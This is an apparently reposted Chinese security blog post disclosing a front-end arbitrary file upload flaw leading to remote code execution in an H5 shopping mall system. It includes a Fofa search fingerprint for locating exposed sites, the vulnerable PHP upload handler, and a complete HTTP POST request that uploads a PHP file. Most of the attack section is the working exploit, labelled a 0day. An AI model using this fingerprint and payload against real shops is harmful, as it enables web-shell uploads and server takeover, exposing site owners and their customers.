某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)

admin 2024年11月18日23:22:52评论33 views字数 2453阅读8分10秒阅读模式
某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)

点击上方蓝字关注我们 并设为星标

0x00 前言

该源码采用HTML5技术开发,可以完美适配各种移动设备,以及iOS和Android系统。同时,易支付接口更为商家提供了便捷的交易功能,让顾客可以轻松通过手机进行网络支付,享受到更加便捷的购物体验。

该源码界面设计十分简洁、清爽,同时还保证了购物流程的顺畅和简便。无论是主页、分类页面、商品详情页面,都给人留下了很好的第一印象。

Fofa指纹:"/src/images/gg.png" && "/public/goods.php"

某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)

0x01 漏洞分析&复现

位于 /admin/commodtiy/file.php 文件中存在move_uploaded_file 函数上传文件,且未有任何过滤,导致漏洞产生.

<?phpif($_GET['upload']){    // 获取上传的文件名$file = pathinfo($_FILES['file']['name']);//获取上传文件的后缀$file_hz= $file['extension'];//以当前时间来拼接一个文件名$file_date = date('Ymdhis');$file_name = $file_date . '.' . $file_hz;//判断当前目录下是否有upload这个文件没有就创建一个$path = 'upload/';$file_path=file_exists($path);if(!$file_path){    mkdir($path);}//如果有上传文件为就执行下面代码if(is_uploaded_file($_FILES['file']['tmp_name'])){    //将上传的临时tmp文件移动到指定位置,并且已指定的file_name来命名文件,成功就echo输出移动后的文件位置。    if(move_uploaded_file($_FILES['file']['tmp_name'],$path.$file_name)){        // echo "当前文件保存路径为:".$_FILES['file']['tmp_name'],$path.;        // echo '文件上传成功';        echo json_encode('/admin/commodtiy/upload/'.$file_name);    } else {        echo '文件上传失败';    }} else {    echo '文件不存在';}}?>

Payload:

POST /admin/commodtiy/file.php?upload=1 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 197Content-Type: multipart/form-data; boundary=------WebKitFormBoundary03rNBzFMIytvpWhyCookie: Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1731328644; PHPSESSID=nbkea3f11cmfad1qhfcm29aqn7; thinkphp_show_page_trace=0|0; bh_myaction=Index%2Findex; _ga=GA1.1.2095806093.1731475984; _gid=GA1.1.546134623.1731475984; yzm=G2DDHost: 127.0.0.1Origin: http://127.0.0.1Referer: http://127.0.0.1/admin/commodtiy/file.php?uploadSec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-user: ?1------WebKitFormBoundary03rNBzFMIytvpWhyContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/jpeg<?php phpinfo();?>------WebKitFormBoundary03rNBzFMIytvpWhy--

某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)

0x02 源码下载

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转

购物商城源码关注公众号发送 241117 获取!

进星悦安全公开群添加下方VX 备注 "进群"

某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月18日23:22:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)https://cn-sec.com/archives/3405346.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息